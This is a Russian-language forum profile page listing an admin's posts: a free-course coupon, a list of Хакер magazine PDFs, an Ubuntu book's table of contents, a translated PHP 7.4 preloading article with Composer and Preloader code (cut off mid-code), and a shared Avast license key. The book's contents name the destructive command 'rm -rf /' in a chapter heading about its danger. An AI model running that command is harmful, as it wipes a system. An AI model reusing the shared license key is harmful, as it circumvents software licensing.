admin

Администрация
  • Публикаций

    33
  • Зарегистрирован

  • Победитель дней

    1

admin стал победителем дня 25 января

admin имел наиболее популярный контент!

Репутация

1 001 Excellent

1 Подписчик

Информация о admin

  • Звание
    не местый

Посетители профиля

2 100 просмотров профиля
  1. Бесплатно (вместо 19799р) получаем обучающий курс Java Programming: Complete Beginner to Advanced 1. Переходим на тык и в поле "Введите купон" вводим промокод 95DF94FC6BD6361D0117 2. Регистрируемся и скачиваем курс
  2. admin

    ХАКЕР

    Хакер №2 (239) (февраль) 2019 .pdf Хакер №3 (240) (март) 2019 .pdf Хакер_2019_04.pdf Хакер 2019 05.pdf Хакер №6 (243) (июнь) 2019 .pdf Хакер_2019_07.pdf Хакер_№9_(246)_(сентябрь)_2019.pdf
  3. Ubuntu_Linux_s_nulya_2018_Volokh.pdf Оглавление Предисловие ................................................................................................................... 11 Для кого эта книга .. " .. ".""."""""""."".""""""" .. ".""""".""".".""".""".".".".".""""".".""".12 Как устроена книга .. """."""."""""" ... """.""".".""."."."." .. "".""."""."."".""" .. "" .. """."."."12 Как читать эту книгу."""" .. "." .. ".""" .. ".""".""." .. """"." .. " .. ".".".""."."."" .. " .. "."."""""""". 13 От автора """""."" ... """""."""." .. """""."""."." .. """."""."""."."""."."" .. "" ... """"." .. "."."."13 Благодарности ............................................................................................ " ........... " ..... " .......... " .. 14 Введение .......................................................................................................................... 15 История появления ОС Linux """.". ". "" ""." ." "" "" .".". ""."" "."." ." ." ". ""." ."."". "".""""" ""16 GNU и Linux. ". " .. ". """"." "" ""." "" " ... " "" ." .. " ""." " ... " ." " .. """ .. "."." .. " ." ." ." ""."""" "" ."." ." 17 Появление различных дистрибутивов"." .. "."".""".""""."".""."".".""."".""""""" .. "." ""."".18 Дистрибутивы Linux ........................................................................................................... " ......... 19 Red Hat Enterprise Linux ... " "" "" ." "" ". "" ." .. " "" """ " ... " ""." "" ."." ." " .. " ""."." ." ." """ .. ".20 Fedora Linux ............................................................................................................................ 20 Deblan ...................................................................... " ............................................... " ............. 20 UЬuntu ............... " ...................................................................................................... " ............ 20 Linux Mint "". "" "" """ .. ". ""." "" "" ". "" " ... "." .. " ." "" ." "" ." .". " .. " ". " ... " ."." "" ." ."""" """ .. 21 Slackware ........................................................................................................ " .......... " .. " ....... 21 Логотип Linux ............................................................................ " ........................ " ..... " .... " ........ ".21 Область применения Linux ............................................................................................ " ....... " .... 22 Идеология свободного ПО ...................................................................................................... " .... 23 Безопасен ли открытый исходный код?" .. """."""."""."." .. "."""" .. """."."" .. "."""."."""." .".24 Критика и очевидные достоинства ОС Linux"".""."" .. """"."""""."."."""" .. """""".".".""".25 ЧАСТЬ 1. ЗНАКОМЬТЕСЬ: UBUNTU ............................................................ : ......... 27 Глава 1. Подготовка к установке ОС Ubuntu Linux ............................................... 29 ОС UЬuntu Linux .............................................................................................................. " ............ 29 Версии дистрибутивов ОС Ubuntu .. " ... " "" ". "" ." "" " ... " " .. ""."". ". "" ."". """ """. ""."."."""" "29 Версии LTS и нe-LTS ."""" .. """".""" ... "." .. " .. "." .. "" .. " .. """"".".""".".""".".".".""."".".".".30 Варианты установки ОС Ubuntu Linux """ " .. ". " .. ". "" ""." "."" "" ". ""."""" ""."."." ""."."."." .30 Порядок установки операционных систем ""." .. ".""""".""".".""""."."".".".".""""."".".".".31 Как получить дистрибутив ОС UЬuntu? .""."""""""""".""""""."".""""" ... "."""."."."."""""31 Запись образа диска с ОС Ubuntu ................................................................................................. 33 4 Оглавление Создание загрузочного флеш-накопителя ................................................................................... 34 Файловые системы ОС UЬuntu Linux ........................................................................................... 36 Файловые системы ext2, ext3 и ext4 ..................................................................................... 36 Файловая система Btrfs ......................................................................................................... 37 Файловая система XFS .......................................................................................................... 37 Файловые системы ReiserFS и Reiser4 ................................................................................. 37 Файловая система JFS ........................................................................................................... 38 Выводы ........................................................................................................................................... 38 Глава 2. Теоретический минимум о файловой системе в ОС Ubuntu Linux"".39 Разделы жесткого диска ............................................................................................................... .39 Первичные, расширенные и логические разделы .............................................................. .40 Точки монтирования ..................................................................................................................... 40 Точки монтирования в ОС Ubuntu ...................................................................................... .41 Очередность создания разделов .................................................................................................. .42 Объем раздела /swap ..................................................................................................................... .43 Объем корневого раздела .............................................................................................................. 43 Объем раздела /home .................................................................................................................... .43 Подготовительные действия перед установкой ......................................................................... .44 Выводы ........................................................................................................................................... 44 Глава 3. Создание разделов для установки ОС Ubuntu Linux """""""""""""".45 Выбор типа носителя для загрузки операционной системы в меню BIOS .............................. .45 Особенности установки на платах с UEFI .................................................................................. .46 Варианты запуска и установки ОС UЬuntu ................................................................................. .46 Запуск ОС Ubuntu с загрузочного флеш-накопителя ......................................................... .47 Запуск ОС Ubuntu с DVD-привода ...................................................................................... .48 Для чего нужен Livе-режим? ............................................................................................... .49 Запуск программы GParted .................................................................................................. .49 Возможности программы GParted ................................................................................................ 50 Разметка жесткого диска в программе GParted .......................................................................... 51 Выводы ........................................................................................................................................... 57 Глава 4. Установка ОС Ubuntu Linux """"""""""""""""""""""""""""""""""". 58 Запуск операционной системы в Livе-режиме ............................................................................ 58 Установка операционной системы из Livе-режима .................................................................... 59 Выводы ........................................................................................................................................... 66 Глава 5. Первый запуск и первоначальная настройка ОС Ubuntu""""""""""67 Запуск ОС Ubuntu .......................................................................................................................... 67 Настройка подключения к Интернету в Ubuntu .......................................................................... 70 Подключение к сети по Wi-Fi ............................................................................................... 70 Настройка подключений в NetworkМanager ........................................................................ 71 Если не определилась сетевая карта .................................................................................... 72 Создание подключения Ethemet ........................................................................................... 73 Подключение через DSL ....................................................................................................... 74 Особый случай подключения через DSL ............................................................................. 76 Подключение с помощью USВ-модема ............................................................................... 82 Возможные проблемы с созданием подключений .............................................................. 85 Вьiводы ........................................................................................................................................... 87 Оглавление 5 Глава 6. У станов ка обновлений и локализация операционной системы""""" 88 Установка обновлений ............................................................................... : .................................. 88 У станов ка пакетов локализации ................................................................................................... 91 Выводы ........................................................................................................................................... 93 Глава 7. Обзор интерфейса ОС Ubuntu"""""""""""""""""""""""""""""""""".94 Графическая среда рабочего стола ............................................................................................... 94 Рабочий стол в Unity ...................................................................................................................... 94 Панель меню .......................................................................................................................... 95 Панель запуска ....................................................................................................................... 97 Рабочее место ......................................................................................................................... 98 Главное меню ............................................................................................................................... 100 Меню HUD ................................................................................................................................... 101 Выводы ......................................................................................................................................... 102 Глава 8. Настройка операционной системы и решение проблем"""""""""""103 Параметры системы ..................................................................................................................... 103 Настройка раскладки клавиатуры .............................................................................................. 104 Смена системного времени ......................................................................................................... 105 Настройка спящего режима ........................................................................................................ 107 Пустой рабочий стол ................................................................................................................... 108 Изменение порядка загрузки операционной системы .............................................................. 109 Выводы ......................................................................................................................................... 111 ЧАСТЬ 11. UBUNTU ДЛЯ ПОЛЬЗОВАТЕЛЯ""""""""""""""""""""""""""""113 Глава 9. Структура файловой системы """""""""""""""""""""""""""""""""115 Файловый менеджер Nautilus ..................................................................................................... 115 Имена устройств .......................................................................................................................... 117 Структура файловой системы ..................................................................................................... 119 Общее описание структуры каталогов ............................................................................... 120 Корневая файловая система ................................................................................................ 123 Домашний каталог пользователя ........................................................................................ 123 Каталог /Ьin/ ......................................................................................................................... 124 Каталог /Ьооt/ ....................................................................................................................... 124 Каталог /cdrorn/ .................................................................................................................... 124 Каталог /dev/ ......................................................................................................................... 124 Каталог /etc/ ........................................................................................................................ "125 Каталог /home/ ...................................................................................................................... 125 Каталоги /liЫ и /Jib64/ .......................................................................................................... 126 Каталог /lost+found/ ................................................................................. " .......................... 126 Каталог /media/ ..................................................................................................................... 126 Каталог /mnt/ ........................................................................................................................ 127 Каталог /opt/ ......................................................................................................................... 127 Каталог /proc/ ....................................................................................................................... 127 Каталог /root/ ........................................................................................................................ 127 Каталог /run/ ......................................................................................................................... 128 Каталог /sЬin/ ........................................................................................................................ 128 Каталог /snap/ ....................................................................................................................... 128 б Оглавление Каталог /srv/ .......................................................................................................................... 128 Каталог /sys/ ......................................................................................................................... 128 Каталог /tinp/ ........................................................................................................................ 129 Каталог /usr/ .......................................................................................................................... 129 Каталог /var/ ......................................................................................................................... 129 Выводы ......................................................................................................................................... 129 Глава 10. Типы файлов в ОС Ubuntu ...................................................................... 130 О файлах и каталогах .................................................................................................................. 130 Содержимое и расширение файлов ............................................................................................ 131 Текстовые файлы ......................................................................................................................... 132 Исполняемые файлы .................................................................................................................... 134 Прочие файлы .............................................................................................................................. 135 Изменение ассоциации файлов ................................................................................................... 135 Выводы ......................................................................................................................................... 137 Глава 11. Администратор и суперпользователь root ........................................... 138 Привилегированный пользователь root ..................................................................................... 138 Обычная учетная запись и запись администратора .................................................................. 139 Привилегии администратора ...................................................................................................... 141 Административные задачи в текстовом режиме ....................................................................... 143 Выводы ......................................................................................................................................... 143 Глава 12. Знакомство с Консолью и Терминалом ................................................ 144 Что такое Терминал и Консоль .................................................................................................. 144 Запуск Консоли ............................................................................................................................ 145 Запуск Терминала ........................................................................................................................ 146 Синтаксис команд в Терминале .................................................................................................. 148 Команда echo ................................................................................................................................ 148 Просмотр версии ядра ................................................................................................................. 149 Установка текушего каталога ..................................................................................................... 149 Просмотр текушего каталога ...................................................................................................... 150 Просмотр содержимого каталога ............................................................................................... 151 Просмотр справки no командам ................................................................................................. 152 Подсказки Терминала .................................................................................................................. 154 История введенных ранее команд .............................................................................................. 154 Очистка окна Терминала ............................................................................................................. 155 Остановка выполнения командъ1 ................................................................................................ 155 Выход из Терминала .................................................................................................................... 156 Выводы ......................................................................................................................................... 156 Глава 13. Полезные команды Терминала .............................................................. 157 О пользе работы в Терминале .................................................................................................... 157 Команда whoami, или "Кто я?" ................................................................................................... 157 Команда who ................................................................................................................................. 158 Создание файлов .......................................................................................................................... 159 Создание каталогов ..................................................................................................................... 162 Удаление каталогов ..................................................................................................................... 163 Удаление каталогов и файлов ..................................................................................................... 164 Опасность выполнения команды rm -rf / ........................................................................... 165 Оглавление 7 Копирование файлов и каталогов.""".""." .......................................................................... " .... 166 Перемещение файлов и каталогов .... " .. " ........................ ".".".""."."."""."""."." .. "." .. "."" .. ".171 Вывод содержимого файла" .. " .. " .. ".""""" .. " ....................... "."." .. " .... " ..... "."." .. ". " ........... " .. 173 Вывод содержимого файла в обратной последовательности ....................... " ......................... 175 Команды more и /ess для просмотра содержимого файлов."."." .......... " ....... "." .. " .. "."" ..... ".177 Команда поиска файлов ...... """" " .. " .. " "". ". " .. " .. ". " .. " .. ". ". "" ". ". " .. ". ". " .. ". ". ". " .. ". ". " .. ". ".181 Отображение каталога программы ". "" ". "".". ". "" " ............ " ......... ". ". ". " .. ". ". ". "" ". ". " .. ". ".183 Поиск текстового шаблона в файлах " .. " .. ". "" """. " .. """" .. "" ". "."" """.".". """"" """."."""183 Управление остановкой системы ... "." ...... " .. "." .. " .. "" .. " .. " .. "." .... " ............ "." ..... " .... "."." .. ".191 Выводы .. "." ..... "." .. " .. "." .. " .. "." ... " .. "" .. " .. "." .. " .. "." .. "." .. " .. "."."." .. "." ..... "."." .... " ...... " ....... 193 Глава 14. Работа с привилегиями root .................................................................... 194 О привилегиях root " ...... " ..... " .. " .. ". " .. ". "". ". " .. ". " ..... " .. ". " .. ". " .. ". " ..... "" .. ". ". "."." .. "." .. "" .. 194 Команда sudo вместо прав root. " ..... " ................ " ............ " ........ " ............ " ....................... " ..... ". 195 Что использовать: sudo или su? " .. " .. "." .. " .. ". "." ... "" .. " .. ". " .. "."." .. ".". " .. "" .. "."."." .. ". "." .. "195 Команда sudo ............................................................................................................................. ".196 Запуск графических программ от имени администратора"."." .. "."."." .. "."."." .. " .... "." ........ 200 Настройка sudo и прав доступа на выполнение команд" .. "." .. "."." .. "." .... "."." .. "."." ..... ".".202 Время действия введенного пароля ........................................................................................... 205 Выводы ....................................................................................................................... " ................ 206 Глава 15. Установка драйверов в ОС Ubuntu ....................................................... 207 Драйверы в ОС UЬuntu ................................................................................................................ 207 Установка сетевой карты Realtek." .. ". " .. ". "." .. " .. ". " .. ". "."." ... ". ". ". " .. ". ".". "."." .. ". ". ". "" ".208 Установка драйвера беспроводной сети Broadcom " .. " ... " .... " .... " .. "" .............. " ........... " .. "" .. 212 Установка драйвера видео карты из репозитория " .. "."." .. "." .. " ..... " .... "."."." ..... " .. " .... ".".".216 Общий метод установки видео драйвера AMD/ А Т1 Radeon""" .. "."." ........ "."." .. "." .... " .. ".".217 Установка аудиодрайвера .. " .. " .. "." .. ".""" .. " .. "."."." .. "."""."""."." .. "."."."." .. "."."." ..... " .... 219 Установка ALSA из исходных текстов " ..... "." .. " .. "." ..... " ..... "." .. "."."." ..... "."." .... " ..... ".".".221 Выводы ....................................................................................................................... " ................ 225 Глава 16. Установка принтера в ОС Ubuntu ......................................................... 226 Об установке принтеров, сканеров и МФУ "."."""."." .. " .. "." .. "." .. "."."."""."." ....... " ........... 226 Где взять необходимые драйверы? ............................................................................................ 226 Устройства Brother ." .. " .. "." .. " ..... " .. " .. "." .. "." .. "." .. " .. "."."." .. "."." .. "."." .. "."."."." .. " ... 227 Устройства Canon ................................................................................................................ 227 Устройства Epson .... " .. "." .. " .. "." .. " .. "." ... "."." .. "." ..... " .. "." .. "." .. "" .. " .... " ........ " ..... "." ... 227 Устройства НР " ...... " .. "." .. " .. "." .. " .. " .. "." .. "."."" ... " .. " .. "." .. "." .. "."."." .. ".:""."." .. " ...... 227 Устройства Samsung ............................................................................................................ 227 Устройства Xerox ................................................................................................................. 228 Установка службы CUPS ...... " .. " .. "." ...... " ..... "." .. " .. "." .. "." .. "." ..... "." .. "."." .. "."." .... " .. "."."228 Установка принтера Epson L800 средствами ОС."." ... " .... " .. "." ........ " .. "."" ........ " ..... " ........ "229 Настройка общего доступа ......................................................................................................... 233 Установка МФУ Epson Stylus СХ5900 с помощью драйверов "." ........ " ................................. 235 Выводы ....................................................................................................................... " ................ 240 Глава 17. Установка и удаление программ в ОС Ubuntu ................................... 241 Особенности установки и удаления программ .......................................................................... 241 Зависимости пакетов в ОС UЬuntu Linux." .. " .. "." .. " .. "." .. "." .. " ..... "."." .. "" .. " .. "" .. "."."242 Установка приложений с помощью Менеджера приложений UЬuntu ".".".""" .... " .. "."243 в Оглавление Установка приложений из dеЬ-пакетов .............................................................................. 246 Установка dеЬ-пакетов с помощью Терминала ................................................................. 248 Установка приложений из Терминала ............................................................................... 251 Установка приложений из исходных текстов .................................................................... 254 РепозИтории в ОС UЬuntu ........................................................................................................... 258 Удаление программ ..................................................................................................................... 262 Выводы ......................................................................................................................................... 264 Глава 18. Установка дополнительного программного обеспечения ................ 265 Дополнительное ПО в Ubuntu .................................................................................................... 265 Дополнительные медиамодули ................................................................................................... 265 Мультимедийные проигрыватели .............................................................................................. 267 WеЬ-браузеры .............................................................................................................................. 269 ВitТоттеnt-клиент ......................................................................................................................... 269 Файловый менеджер .................................................................................................................... 270 Редактирование изображений ..................................................................................................... 270 Запись СD/DVD-дисков .............................................................................................................. 271 Выводы ......................................................................................................................................... 271 Глава 19. Запуск Windоws-приложений в ОС Linux ............................................ 272 Wiпe для запуска приложений ОС Windows ............................................................................. 272 Установка Wiпe ............................................................................................................................ 272 Установка и запуск Windоws-приложений ................................................................................ 275 Выводы ......................................................................................................................................... 278 Глава 20. Работа с архивами в ОС Ubuntu ............................................................. 279 Об архивах в ОС Ubuntu .............................................................................................................. 279 Менеджер архивов ....................................................................................................................... 279 Несжатые и сжатые архивы ........................................................................................................ 281 Архиватор tar ................................................................................................................................ 282 Архиватор gzip ............................................................................................................................. 286 Архиватор bzip2 ........................................................................................................................... 288 Прочие архиваторы ..................................................................................................................... 288 Неизвестный тип файла ............................................................................................................... 290 Выводы ......................................................................................................................................... 290 ЧАСТЬ 111. UBUNTU ДЛЯ ОПЫТНОГО ПОЛЬЗОВАТЕЛЯ ............................ 291 Глава 21. Группы пользователей и права доступа ............................................... 293 Пользовательские группы ........................................................................................................... 293 Права доступа в Linux ................................................................................................................. 293 Буквенное представление прав доступа к файлу ...................................................................... 295 Буквенное представление прав доступа к каталогам ................................................................ 297 Цифровое представление прав доступа ..................................................................................... 300 Символьные биты SUID, SGID и sticky ..................................................................................... 301 Права доступа по умолчанию ..................................................................................................... 304 Смена прав ................................................................................................................................... 305 Смена владельца файла ............................................................................................................... 308 Смена атрибутов файла .............................................................................................................. .308 Оглавление Просмотр атрибутов .................................................................................................................... 31 О Выводы ......................................................................................................................................... 311 Глава 22. Жесткие и символические ссылки """"""""""""""""""""""""""""312 Ссылки в ОС Linux ...................................................................................................................... 312 Типы ссылок ................................................................................................................................. 313 Создание ссьшок .......................................................................................................................... 314 Работа с символическими ссылками .......................................................................................... 316 Работа с жесткими ссылками ...................................................................................................... 318 Выводы ......................................................................................................................................... 319 Глава 23. Монтирование файловых систем""""""""""""""""""""""""""""".320 Точка монтирования .................................................................................................................... 320 Монтирование устройств в ОС Ubuntu ...................................................................................... 320 Способы постоянных именований ............................................................................................. 321 Именование посредством UUID ........................................................................................ .323 Именование посредством имен устройств ........................................................................ 324 Именование посредством меток устройств ...................................................................... .324 Именование посредством Hardware ID .............................................................................. 326 Универсальный метод получения информации о блочных устройствах ................................ 327 Автоматическое монтирование .................................................................................................. 327 Ручное монтирование и размонтирование устройства ............................................................. 331 Выводы ......................................................................................................................................... 332 Глава 24. Уровни выполнения и цели в ОС Ubuntu""""""""""""""""""""""333 Инициализация системы ............................................................................................................. 333 Уровни выполнения ..................................................................................................................... 333 Современная система уровня запуска ........................................................................................ 335 Выводы ......................................................................................................................................... 338 Глава 25. Службы в ОС Ubuntu""""""""""""""""""""""""""""""""""""""""339 Службы, сервисы и демоны ........................................................................................................ 339 Службы в ОС Ubuntu .................................................................................................................. .339 Управление службами в ОС Ubuntu ........................................................................................... 340 Автозагрузка служб и отключение служб ................................................................................. 345 Управление питанием .................................................................................................................. 346 Управление питанием ACPI ........................................................................................................ 347 Ведение логов в systemd .............................................................................................................. 348 Выводы ......................................................................................................................................... 349 Глава 26. Управление процессами в ОС Ubuntu """""""""""""""""""""""" .. 350 Процессы в ОС UЬuntu ................................................................................................................ 350 Системный монитор процессов top ............................................................................................ 350 Получение списка процессов ...................................................................................................... 354 Завершение процесса командой kill ........................................................................................... 3 56 Завершение процесса командой kil/all ....................................................................................... 358 Управление процессами в Консоли ........................................................................................... 360 Прочие инструменты по управлению процессами ................................................................... 361 Выводы ......................................................................................................................................... 362 10 Оглавление Глава 27. Проверка работоспособности сети в ОС Ubuntu ................................. 363 Сеть в ОС UЬuntu ......................................................................................................................... 363 Определение сетевого оборудования ......................................................................................... 363 Проверка соединения с Интернетом .......................................................................................... 365 Трассировка маршрута ................................................................................................................ 367 Выводы ......................................................................................................................................... 369 Глава 28. Подключение к удаленному рабочему столу ....................................... 370 Удаленный рабочий стол ............................................................................................................ 370 Подключение к рабочему столу Windows ................................................................................. 370 Подключение с помощью TeamViewer ...................................................................................... 374 Выводы ......................................................................................................................................... 376 Глава 29. Восстановление загрузчика GRUB ........................................................ 377 Сбой в работе загрузчика ............................................................................................................ 377 Восстановление загрузчика GRUВ ............................................................................................ 377 Простой способ восстановления загрузчика GRUB ................................................................ .380 Восстановление GRUB в консоли загрузчика ........................................................................... 382 Выводы ......................................................................................................................................... 384 Глава 30. Увеличение разрешения ОС Ubuntu в VirtualBox .............................. 385 ОС UЬuntu в виртуальной машине ............................................................................................. 385 Виртуальная машина Orac\e УМ Virtua\Box ............................................................................. 385 Низкое разрешение экрана в виртуальной машине .................................................................. 386 Установка дополнений ................................................................................................................ 3 86 Выводы ......................................................................................................................................... 390 Заключение ............................................................•...................................................... 391 Приложение. Описание электронного архива ....................................................... 393 Предметный указатель .............................................................................................. 395
  4. admin

    avast

    Бесплатно получаем лицензию на антивирус Avast Premier на 9 лет 1.Переходим на сайт Avast и жмём на кнопку Бесплатная загрузка для ПК 2.В настройках вводим ключ лицензии 3DWS9E-CW75YJ-4Q48YA
  5. Как Composer должен выполнять предзагрузку в PHP 7.4 Предзагрузка (preload) — одна из важных возможностей, которую PHP 7.4 предлагает разработчикам, нуждающимся в более высокой производительности. Эту функцию можно назвать «прогревом» перед внедрением JIT-движка, который появится (или должен появиться) в PHP 8. До этого будет достаточно предзагрузки, и кто знает, возможно, они смогут работать в тандеме. Что собой представляет функция предзагрузки, объяснено в этой статье. Суть очень проста: в php.ini указывается PHP-скрипт, для которого при запуске процесса в память загружаются файлы (предзагрузка). В сочетании с OPCache и функцией autoloader Composer-файлы также могут быть однократно скомпилированы и залинкованы, после чего они будут доступны для всех последующих запросов. Благодаря этому PHP не нужно загружать и компилировать файлы при каждом запросе. Однако разработчики Composer не пришли к согласию, как он должен помогать предзагрузке, помимо предоставления функции автозагрузки. Факты таковы: предзагрузка впервые анонсирована в PHP 7.4; не существует директивы Composer, помогающей выполнять предзагрузку файлов; для предзагрузки нужен доступ к php.ini, то есть к самому процессу; предзагрузка всех файлов не обязательно повысит производительность по сравнению с предзагрузкой только самых востребованных файлов. Иными словами, предзагрузкой смогут пользоваться только те, у кого есть полный доступ к серверам. Это исключает серверы общего использования и некоторые PaaS-решения, которые не предполагают работу с php.ini. Итак, как же Composer может помочь предзагрузке, учитывая, что это нововведение? Вот моё мнение. Как должна работать предзагрузка Механизм работы предзагрузки должен опираться на список файлов, которые будут загружены и сохранены в памяти при запуске. А поскольку это список, нам нужно работать с массивом файлов и позволить Composer выполнять всю работу, а не загружать каждый файл вручную. Composer должен брать список файлов, заданный приложением (корневым проектом), и компилировать всё в файлы, которые PHP сможет использовать безо всяких затруднений. В то же время нам нужна возможность добавлять и удалять пакеты из механизма предзагрузки. Предзагрузка никогда не должна работать на уровне пакетов, поскольку это ответственность разработчика — разрешать или запрещать предзагрузку каждого пакета. Предзагрузка в Composer должна быть опциональной. Разработчик должен иметь возможность её отключать, чтобы PHP использовал собственный предзагрузчик, который может работать на основе анализа OPCache, — это зависит от загрузки приложения и работает гораздо эффективнее простой предзагрузки всех файлов. Всё начинается в preload.json Чтобы не усложнять систему, поместим в корень проекта файл preload.json. В нём будут перечислены файлы для предзагрузки, которые сможет выбирать Composer. Поскольку это JSON-файл, разработчик может по своему усмотрению даже генерировать его с помощью специальной команды. Я считаю, что было бы отлично, если бы Composer имел утилиту для создания такого JSON-файла на основе скрипта. { "pre-compile": [ "my-script.php", "my-other-script.php" ], "extensions": [ "php" ], "files": [ "app/*", "config/", "helpers.php", "app/Models/*", "app/Controllers/*/Http/*", "app/Views/Compiled*.php" ], "namespace": [ "App\\Models", "App\\Controllers\\", "App\\Views\\MainView", "Vendor\\Package\\*", ], "packages": { "symfony/http-client": true, "robert/*-client": true, "vendor/package": { "files": true, "namespace": true }, "foo/bar": { "files": [ "helpers.php", "loaders/*" ], "namespace": [ "Foo\\Bar\\DynamicLoaders\\*", "Foo\\Bar\\Clients" ] } }, "output": "preload-compiled.php" } Использование preload.json позволяет быстро проверять, включена ли в проекте предзагрузка: если файл отсутствует, то предзагрузка не поддерживается или нежелательна. Давайте разберёмся, что делают ключи. pre-compile Эти файлы будут исполняться Composer. Каждый скрипт должен вернуть массив абсолютных путей к файлам, чтобы добавить их в список предзагрузки, который будет играть роль основного списка. "pre-compile": [ "my-script.php", "my-other-script.php" ] Эти файлы будут исполнены в указанном порядке. Цель в том, чтобы разработчик мог создавать список файлов по своему усмотрению, а не полагаться на один лишь JSON-файл. Эти файлы будут исполнены прежде всего. И да, вы сможете реализовать preload.json только с этим ключом. Поскольку мы говорим о PHP-файлах, при компилировании массива вы даже можете добавлять другие файлы extensions Это список расширений файлов, которые нужно предварительно загрузить. По умолчанию берутся файлы только с расширением php. "extensions": ["php", "php5", "php7"] Например, вы можете добавить директорию, наполненную файлами *.phtml, среди которых несколько полезных PHP-файлов, и Composer выберет только их, а не всё содержимое директории. Как вы понимаете, этот процесс можно заменить добавлением файлов вручную. files Этот ключ говорит Composer, чтобы он загрузил все файлы из списка, пути к которым указаны относительно местонахождения composer.json. "files": [ "helpers.php", "app/Models/*", "app/Controllers/*/Http/*", "app/Views/Compiled*.php", ] Разобраться в списке очень просто: -для добавления файлов и директорий используйте относительные пути; -из директорий будут добавляться только хранящиеся в них дочерние файлы (не рекурсивно); -рекурсивные пути обозначаются окончанием в виде звёздочки (*); -с помощью этого символа вы также можете, к примеру, добавлять определённые файлы и директории: src/Clients/*/Stores или src/Model*.php. Добавление файлов по маске без ручного выбора или создания привязанных к приложению скриптов особенно полезно при разработке больших приложений. Если вам нужно просто предварительно загрузить все файлы с помощью ключа autoload в JSON-файле Composer, то присвойте ему значение true. namespace Этот ключ говорит Composer, чтобы тот загрузил файлы с заданным пространством имён или названием класса вроде file или directory. Этот же механизм позволяет динамически вызывать имена пространств из других установленных пакетов. "namespaces": [ "App\\Models", "App\\Controllers\\", "App\\Views\\MainView", "Vendor\\Package\\*", ] Это тоже удобно при работе над большими приложениями, больше зависящими от пространств имён, а не от файлов, которые могут в любой момент измениться. Composer будет автоматически извлекать файлы в соответствии с пространством имён и помещать их в список. packages Этот ключ позволяет загружать другие файлы, зарегистрированные из внешних пакетов, например вспомогательные файлы или классы, привязанные к пространству имён. "packages": { "symfony/http-client": true, "robert/*-client": true, "vendor/package": { "files": true, "namespace": true }, "foo/bar": { "files": { "helpers.php", "loaders/*" }, "namespace": [ "Foo\\Bar\\DynamicLoaders\\*", "Foo\\Bar\\Clients" ] } } Тут всё очень просто: если значение равно true, то будет загружено всё содержимое ключа autoload в файле composer.json этого пакета. В противном случае можно более тонко управлять добавлением в предзагрузку. Если значение ключа равно true, то он загрузит все файлы, зарегистрированные в autoload. По умолчанию значение равно false. Это верно и для ключа namespace. Также с помощью этого правила можно выбирать отдельные файлы или пространства имён. Но в таком случае ключ autoload использоваться не будет. output Это просто имя файла скомпилированного списка предзагрузки. "output": "preload-compiled.php" Простота сборки Наш список предзагрузки готов, и мы можем вызвать Composer, чтобы он собрал основной скрипт предзагрузки. composer preload В результате будет создан preload-compiled.php со всеми файлами, которые должен предварительно загрузить PHP. Конечно, вы можете изменить название файла по своему усмотрению. Также нужно переопределить ключи preload параметрами. composer preload \ --input=my-custom-preload-list.json \ --output=my-preload.php Отключено по умолчанию Проекты без preload.json будут возвращать ошибку, если вы попытаетесь собрать файл для предзагрузки. Причина в том, что Composer не будет (да и не должен) гадать, что ему предварительно загружать. Напомню, что preload не вмешивается в нормальную функциональность Composer. Поскольку это консольная команда, то при локальной разработке вы можете полностью отказаться от предварительной загрузки. Единственное, что нужно механизму предзагрузки от Composer, это файл Autoload, который должен быть сгенерирован в случае отсутствия. Ну ведь почти 2020-й год на дворе, везде используется PSR-4, верно? Результат У вас должен получиться php-файл с примерно таких содержимым: <?php /** * Preloading @generated by Composer */ // Autoload the classes so those can be preloaded using `require_once`. require_once __DIR__.'/../autoload.php'; // File list $files = [ '/var/www/app/Foo.php', '/var/www/app/Bar.php', '/var/www/helpers/basic.php', '/var/www/helpers/advanced.php', '/var/www/vendor/Foo/Bar/src/Class.php', '/var/www/vendor/Foo/Bar/helpers/helpers.php', '/var/www/vendor/Foo/Bar/config.php', // ... ]; // Preload all root project files foreach ($files as $file) { require_once $file; } По сути, это лишь список файлов, которые будут предварительно загружаться с помощью функции autoloader в Composer. PHP исполнит этот файл однократно, и он станет историей. Я искренне надеюсь, что в Composer появится какой-то способ предварительно загружать файлы без необходимости писать хак. Поскольку описанный выше способ не является частью ядра Composer, вы всё ещё можете на основе анализа OPCache выбирать для предзагрузки самые важные файлы, не трогая менее востребованные. Представьте, что вместо предзагрузки 1500 файлов объёмом 100 Мб вы можете загрузить всего 150 файлов объёмом 10 Мб, сохранив 99% изначальной производительности. Предзагружаем одной строкой проект на PHP 7.4 Вскоре после того как я написал статью о том, как Composer может помочь вам в предзагрузке проекта, Seldaek (участник команды разработки Composer) убил всякую надежду на появление в Composer опции лёгкой предзагрузки проекта в PHP-процесс из менеджера пакетов. Почему? Предзагрузка в PHP является проблемой скорее разработки (а не зависимостей), она решается с помощью ручного редактирования php.ini — это могут делать только разработчики, если они сами управляют PHP. Но это не помешает мне создать свой пакет для предзагрузки проекта. И вам тоже. Предзагрузка и метрики Предзагрузка может стать хорошим инструментом для простого и дешёвого повышения производительности без серьёзной переработки. Но проблема не в том, как предзагружать, а что. Предзагрузка целых фреймворков и тысяч файлов быстро истощит память, так что делать это вслепую — не вариант, по крайней мере в больших проектах. Целесообразно загружать только самые востребованные файлы. Но как их определить? К счастью, OPCache позволяет с помощью opcache_get_status() собирать данные о том, к каким файлам происходит больше всего обращений. Можно не только узнать, какие файлы самые востребованные, но даже сколько памяти они потребляют спустя какое-то время после запуска приложения. Рекомендуют подождать либо неделю, либо до того момента, когда OPCache зарегистрирует определённое количество обращений. Всё зависит от приложения, но суть вы поняли. Так давайте создадим список предзагрузки на основе статистики наиболее популярных файлов. Я сделал для этого пакет. Я долго ломал голову в поисках наилучшей стратегии создания списка. И пришёл к выводу, что лучше всего добавлять в него все файлы, пока не упрёшься в предел памяти, который для пакетов по умолчанию равен 32 Мб. Файлы будут отсортированы по количеству обращений, а сам пакет автоматически будет исключен. Иными словами, PHP повысит производительность приложения при обработке большинства запросов к нему. И как это использовать? Укажите Composer Autoloader, куда записывать скрипт Preloader, и готово. use DarkGhostHunter\Preloader\Preloader; Preloader::make() ->autoload('vendor/autoload.php') ->output('preload.php') ->generate(); Конечно, вам выбирать, когда генерировать, но в этом вся соль. Вы даже можете делать это рандомно и перезаписывать список, например, на каждый 100-й запрос. use DarkGhostHunter\Preloader\Preloader; Preloader::make() ->whenOneIn(100) ->autoload('vendor/autoload.php') ->output('preload.php') ->overwrite() ->generate(); Вы получите готовый скрипт предзагрузки, которой можно класть в php.ini. <?php /** * This file is generated automatically by Preloader. * * This script uses Composer Autoload file and `require_once` to 